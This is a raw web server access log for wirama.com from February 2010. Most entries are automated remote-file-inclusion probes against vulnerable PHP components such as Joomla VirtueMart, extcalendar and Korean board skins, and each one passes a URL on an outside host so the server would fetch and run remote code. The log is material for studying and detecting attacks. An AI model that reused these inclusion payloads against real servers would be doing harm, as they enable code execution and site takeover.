220.73.144.196 - - [01/Feb/2010:00:26:31 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.outdoorbooks.co.kr/admin/lib/tmp/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
220.73.144.196 - - [01/Feb/2010:00:26:38 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.outdoorbooks.co.kr/admin/lib/tmp/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
220.73.144.196 - - [01/Feb/2010:00:26:41 -0800] "GET /logs/access_090731.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.outdoorbooks.co.kr/admin/lib/tmp/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
220.73.144.196 - - [01/Feb/2010:00:26:41 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.outdoorbooks.co.kr/admin/lib/tmp/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
200.219.195.66 - - [01/Feb/2010:00:26:52 -0800] "GET /logs/access_090601.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
200.219.195.66 - - [01/Feb/2010:00:26:52 -0800] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
200.219.195.66 - - [01/Feb/2010:00:26:52 -0800] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.239.121.204 - - [01/Feb/2010:00:26:55 -0800] "GET /logs/access_090329.log///_test_holidays.php?APB_rp=http://atlantadigital.com///sh/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.239.121.204 - - [01/Feb/2010:00:26:55 -0800] "GET /logs///_test_holidays.php?APB_rp=http://atlantadigital.com///sh/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.239.121.204 - - [01/Feb/2010:00:26:55 -0800] "GET //_test_holidays.php?APB_rp=http://atlantadigital.com///sh/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.239.121.204 - - [01/Feb/2010:00:26:57 -0800] "GET //_test_holidays.php?APB_rp=http://atlantadigital.com///sh/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.239.121.204 - - [01/Feb/2010:00:26:57 -0800] "GET /logs///_test_holidays.php?APB_rp=http://atlantadigital.com///sh/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.239.121.204 - - [01/Feb/2010:00:26:57 -0800] "GET /logs/access_090329.log///_test_holidays.php?APB_rp=http://atlantadigital.com///sh/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.239.121.204 - - [01/Feb/2010:00:27:02 -0800] "GET /logs/access_090301.log///_test_holidays.php?APB_rp=http://atlantadigital.com///sh/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
65.55.106.109 - - [01/Feb/2010:00:27:02 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
211.239.121.204 - - [01/Feb/2010:00:27:04 -0800] "GET /logs/access_090301.log///_test_holidays.php?APB_rp=http://atlantadigital.com///sh/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.239.121.204 - - [01/Feb/2010:00:27:04 -0800] "GET /logs/access_090401.log///_test_holidays.php?APB_rp=http://atlantadigital.com///sh/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.239.121.204 - - [01/Feb/2010:00:27:16 -0800] "GET /logs/access_090401.log///_test_holidays.php?APB_rp=http://atlantadigital.com///sh/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
200.199.242.22 - - [01/Feb/2010:00:27:24 -0800] "GET /logs///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
200.199.242.22 - - [01/Feb/2010:00:27:24 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
200.199.242.22 - - [01/Feb/2010:00:27:24 -0800] "GET /logs/access_090801.log%20%20///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
67.195.112.29 - - [01/Feb/2010:00:27:51 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
67.195.112.29 - - [01/Feb/2010:00:27:51 -0800] "GET /_private/?M=D HTTP/1.0" 200 659 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
65.55.106.109 - - [01/Feb/2010:00:28:05 -0800] "GET /logs/ HTTP/1.1" 200 3941 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
219.93.36.90 - - [01/Feb/2010:00:28:52 -0800] "GET /logs/access_090330.log//?_zb_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
219.93.36.90 - - [01/Feb/2010:00:28:52 -0800] "GET /logs//?_zb_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3946 "-" "Mozilla/5.0" "wirama.com"
219.93.36.90 - - [01/Feb/2010:00:28:52 -0800] "GET /?_zb_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "wirama.com"
200.219.195.66 - - [01/Feb/2010:00:30:32 -0800] "GET /logs/access_100101.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
221.143.40.35 - - [01/Feb/2010:00:30:54 -0800] "GET /logs//administrator/components/com_moofaq/css/file_includer.php?file=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
221.143.40.35 - - [01/Feb/2010:00:30:54 -0800] "GET /logs/access_091101.log//administrator/components/com_moofaq/css/file_includer.php?file=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
221.143.40.35 - - [01/Feb/2010:00:30:54 -0800] "GET /administrator/components/com_moofaq/css/file_includer.php?file=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
221.143.40.35 - - [01/Feb/2010:00:31:25 -0800] "GET /logs/access_091031.log//administrator/components/com_moofaq/css/file_includer.php?file=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
200.199.242.22 - - [01/Feb/2010:00:32:16 -0800] "GET /logs/access_091101.log%20%20///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
210.116.103.118 - - [01/Feb/2010:00:34:05 -0800] "GET //vwar/backup/errors.php?error=http://www.eisaac.com/css/_vti_cnf/hosting/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
210.116.103.118 - - [01/Feb/2010:00:34:56 -0800] "GET /logs/access_090329.log///vwar/backup/errors.php?error=http://www.eisaac.com/css/_vti_cnf/hosting/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
210.116.103.118 - - [01/Feb/2010:00:34:56 -0800] "GET /logs///vwar/backup/errors.php?error=http://www.eisaac.com/css/_vti_cnf/hosting/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
202.150.132.139 - - [01/Feb/2010:00:36:14 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://blog.satyammatrimonial.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
202.150.132.139 - - [01/Feb/2010:00:36:14 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://blog.satyammatrimonial.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
202.150.132.139 - - [01/Feb/2010:00:36:15 -0800] "GET /logs/access_091101.log//bbs//skin/ggambo7002_board/write.php?dir=http://blog.satyammatrimonial.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
202.150.132.139 - - [01/Feb/2010:00:37:11 -0800] "GET /logs/access_091101.log//bbs//skin/ggambo7002_board/write.php?dir=http://blog.satyammatrimonial.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
202.150.132.139 - - [01/Feb/2010:00:37:11 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://blog.satyammatrimonial.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
202.150.132.139 - - [01/Feb/2010:00:37:11 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://blog.satyammatrimonial.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
210.116.103.118 - - [01/Feb/2010:00:37:53 -0800] "GET /logs/access_090330.log///vwar/backup/errors.php?error=http://www.eisaac.com/css/_vti_cnf/hosting/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
200.199.242.22 - - [01/Feb/2010:00:37:59 -0800] "GET /logs/access_090801.log///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
219.93.36.90 - - [01/Feb/2010:00:45:07 -0800] "GET /logs/access_090601.log//?_zb_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
65.55.106.133 - - [01/Feb/2010:00:48:13 -0800] "GET /pr01.htm HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
74.208.14.52 - - [01/Feb/2010:00:48:38 -0800] "GET /components/com_virtuemart/errors.php?error=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
74.208.14.52 - - [01/Feb/2010:00:48:38 -0800] "GET /logs//components/com_virtuemart/errors.php?error=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
74.208.14.52 - - [01/Feb/2010:00:48:38 -0800] "GET /logs/access_090601.log//components/com_virtuemart/errors.php?error=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
74.208.14.52 - - [01/Feb/2010:00:48:43 -0800] "GET /logs//components/com_virtuemart/errors.php?error=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
74.208.14.52 - - [01/Feb/2010:00:48:43 -0800] "GET /logs/access_090601.log//components/com_virtuemart/errors.php?error=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
74.208.14.52 - - [01/Feb/2010:00:48:43 -0800] "GET /components/com_virtuemart/errors.php?error=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
219.93.36.90 - - [01/Feb/2010:00:49:04 -0800] "GET /logs/access_090601.log//?_zb_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
151.8.79.19 - - [01/Feb/2010:00:50:36 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
151.8.79.19 - - [01/Feb/2010:00:50:36 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
151.8.79.19 - - [01/Feb/2010:00:50:36 -0800] "GET /logs/access_090801.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
202.150.132.139 - - [01/Feb/2010:00:51:13 -0800] "GET /logs/access_091201.log//bbs//skin/ggambo7002_board/write.php?dir=http://blog.satyammatrimonial.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
221.143.40.35 - - [01/Feb/2010:00:51:43 -0800] "GET /logs/access_090731.log/twindow_search_rank.php?shop_this_skin_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
221.143.40.35 - - [01/Feb/2010:00:51:43 -0800] "GET /logs/twindow_search_rank.php?shop_this_skin_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
221.143.40.35 - - [01/Feb/2010:00:51:43 -0800] "GET /twindow_search_rank.php?shop_this_skin_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
202.150.132.139 - - [01/Feb/2010:00:52:32 -0800] "GET /logs/access_091201.log//bbs//skin/ggambo7002_board/write.php?dir=http://blog.satyammatrimonial.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
115.68.3.94 - - [01/Feb/2010:00:53:33 -0800] "GET /components/com_virtuemart/errors.php?error=http://atlantadigital.com///sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
115.68.3.94 - - [01/Feb/2010:00:53:33 -0800] "GET /logs//components/com_virtuemart/errors.php?error=http://atlantadigital.com///sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
115.68.3.94 - - [01/Feb/2010:00:53:33 -0800] "GET /logs/access_090731.log//components/com_virtuemart/errors.php?error=http://atlantadigital.com///sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
115.68.3.94 - - [01/Feb/2010:00:54:07 -0800] "GET /components/com_virtuemart/errors.php?error=http://atlantadigital.com///sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
115.68.3.94 - - [01/Feb/2010:00:54:09 -0800] "GET /logs/access_090731.log//components/com_virtuemart/errors.php?error=http://atlantadigital.com///sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
115.68.3.94 - - [01/Feb/2010:00:54:50 -0800] "GET /logs//components/com_virtuemart/errors.php?error=http://atlantadigital.com///sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
115.68.3.94 - - [01/Feb/2010:00:54:50 -0800] "GET /components/com_virtuemart/errors.php?error=http://atlantadigital.com///sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
221.143.40.35 - - [01/Feb/2010:00:55:03 -0800] "GET /logs/access_090329.log/twindow_search_rank.php?shop_this_skin_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
221.143.40.35 - - [01/Feb/2010:00:55:03 -0800] "GET /twindow_search_rank.php?shop_this_skin_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
221.143.40.35 - - [01/Feb/2010:00:55:03 -0800] "GET /logs/twindow_search_rank.php?shop_this_skin_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
221.143.40.35 - - [01/Feb/2010:00:55:03 -0800] "GET /logs/access_090731.log/twindow_search_rank.php?shop_this_skin_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
221.143.40.35 - - [01/Feb/2010:00:55:29 -0800] "GET /twindow_search_rank.php?shop_this_skin_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
221.143.40.35 - - [01/Feb/2010:00:55:29 -0800] "GET /logs/access_090731.log/twindow_search_rank.php?shop_this_skin_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
221.143.40.35 - - [01/Feb/2010:00:55:29 -0800] "GET /logs/twindow_search_rank.php?shop_this_skin_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
115.68.3.94 - - [01/Feb/2010:00:56:48 -0800] "GET /logs/access_090731.log//components/com_virtuemart/errors.php?error=http://atlantadigital.com///sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
115.68.3.94 - - [01/Feb/2010:00:56:49 -0800] "GET /logs//components/com_virtuemart/errors.php?error=http://atlantadigital.com///sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
115.68.3.94 - - [01/Feb/2010:00:56:49 -0800] "GET /components/com_virtuemart/errors.php?error=http://atlantadigital.com///sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
115.68.3.94 - - [01/Feb/2010:00:56:51 -0800] "GET /logs/access_090731.log//components/com_virtuemart/errors.php?error=http://atlantadigital.com///sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
115.68.3.94 - - [01/Feb/2010:00:56:51 -0800] "GET /logs//components/com_virtuemart/errors.php?error=http://atlantadigital.com///sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
115.68.3.94 - - [01/Feb/2010:00:56:51 -0800] "GET /components/com_virtuemart/errors.php?error=http://atlantadigital.com///sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
221.143.40.35 - - [01/Feb/2010:00:56:56 -0800] "GET /logs/twindow_search_rank.php?shop_this_skin_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
221.143.40.35 - - [01/Feb/2010:00:56:56 -0800] "GET /twindow_search_rank.php?shop_this_skin_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
221.143.40.35 - - [01/Feb/2010:00:56:56 -0800] "GET /logs/access_090731.log/twindow_search_rank.php?shop_this_skin_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [01/Feb/2010:00:57:57 -0800] "GET /administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [01/Feb/2010:00:57:57 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [01/Feb/2010:00:57:57 -0800] "GET /logs/access_100101.log//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [01/Feb/2010:00:59:04 -0800] "GET /administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [01/Feb/2010:00:59:04 -0800] "GET /logs/access_100101.log//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [01/Feb/2010:00:59:04 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [01/Feb/2010:00:59:06 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [01/Feb/2010:00:59:06 -0800] "GET /logs/access_100101.log//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [01/Feb/2010:00:59:06 -0800] "GET /administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [01/Feb/2010:00:59:13 -0800] "GET /logs/access_100101.log//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [01/Feb/2010:00:59:13 -0800] "GET /administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [01/Feb/2010:00:59:13 -0800] "GET /logs/access_100101.log//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [01/Feb/2010:00:59:13 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [01/Feb/2010:00:59:13 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [01/Feb/2010:00:59:13 -0800] "GET /administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
115.68.3.94 - - [01/Feb/2010:01:03:12 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://atlantadigital.com///sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
115.68.3.94 - - [01/Feb/2010:01:03:12 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://atlantadigital.com///sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
115.68.3.94 - - [01/Feb/2010:01:03:14 -0800] "GET /logs/access_090329.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://atlantadigital.com///sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
115.68.3.94 - - [01/Feb/2010:01:03:14 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://atlantadigital.com///sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
115.68.3.94 - - [01/Feb/2010:01:03:16 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://atlantadigital.com///sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
115.68.3.94 - - [01/Feb/2010:01:03:27 -0800] "GET /logs/access_090330.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://atlantadigital.com///sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
115.68.3.94 - - [01/Feb/2010:01:03:28 -0800] "GET /logs/access_090330.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://atlantadigital.com///sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
115.68.3.94 - - [01/Feb/2010:01:03:54 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://atlantadigital.com///sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
115.68.3.94 - - [01/Feb/2010:01:03:54 -0800] "GET /logs/access_090329.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://atlantadigital.com///sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
115.68.3.94 - - [01/Feb/2010:01:03:55 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://atlantadigital.com///sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
115.68.3.94 - - [01/Feb/2010:01:04:03 -0800] "GET /logs/access_090330.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://atlantadigital.com///sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
115.68.3.94 - - [01/Feb/2010:01:05:25 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://atlantadigital.com///sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
115.68.3.94 - - [01/Feb/2010:01:05:25 -0800] "GET /logs/access_090329.log//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://atlantadigital.com///sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
115.68.3.94 - - [01/Feb/2010:01:05:25 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://atlantadigital.com///sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
221.143.40.35 - - [01/Feb/2010:01:05:58 -0800] "GET /logs/access_090329.log/twindow_search_rank.php?shop_this_skin_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
115.68.3.94 - - [01/Feb/2010:01:06:14 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://atlantadigital.com///sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
115.68.3.94 - - [01/Feb/2010:01:06:14 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://atlantadigital.com///sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
115.68.3.94 - - [01/Feb/2010:01:06:48 -0800] "GET /logs/access_090330.log//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://atlantadigital.com///sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
115.68.3.94 - - [01/Feb/2010:01:08:40 -0800] "GET /logs/access_090330.log//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://atlantadigital.com///sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
118.217.5.166 - - [01/Feb/2010:01:09:13 -0800] "GET /logs//setup/header.php?css_path=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
118.217.5.166 - - [01/Feb/2010:01:09:13 -0800] "GET /logs/access_090329.log//setup/header.php?css_path=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
118.217.5.166 - - [01/Feb/2010:01:09:13 -0800] "GET /setup/header.php?css_path=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/upload/hilang1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
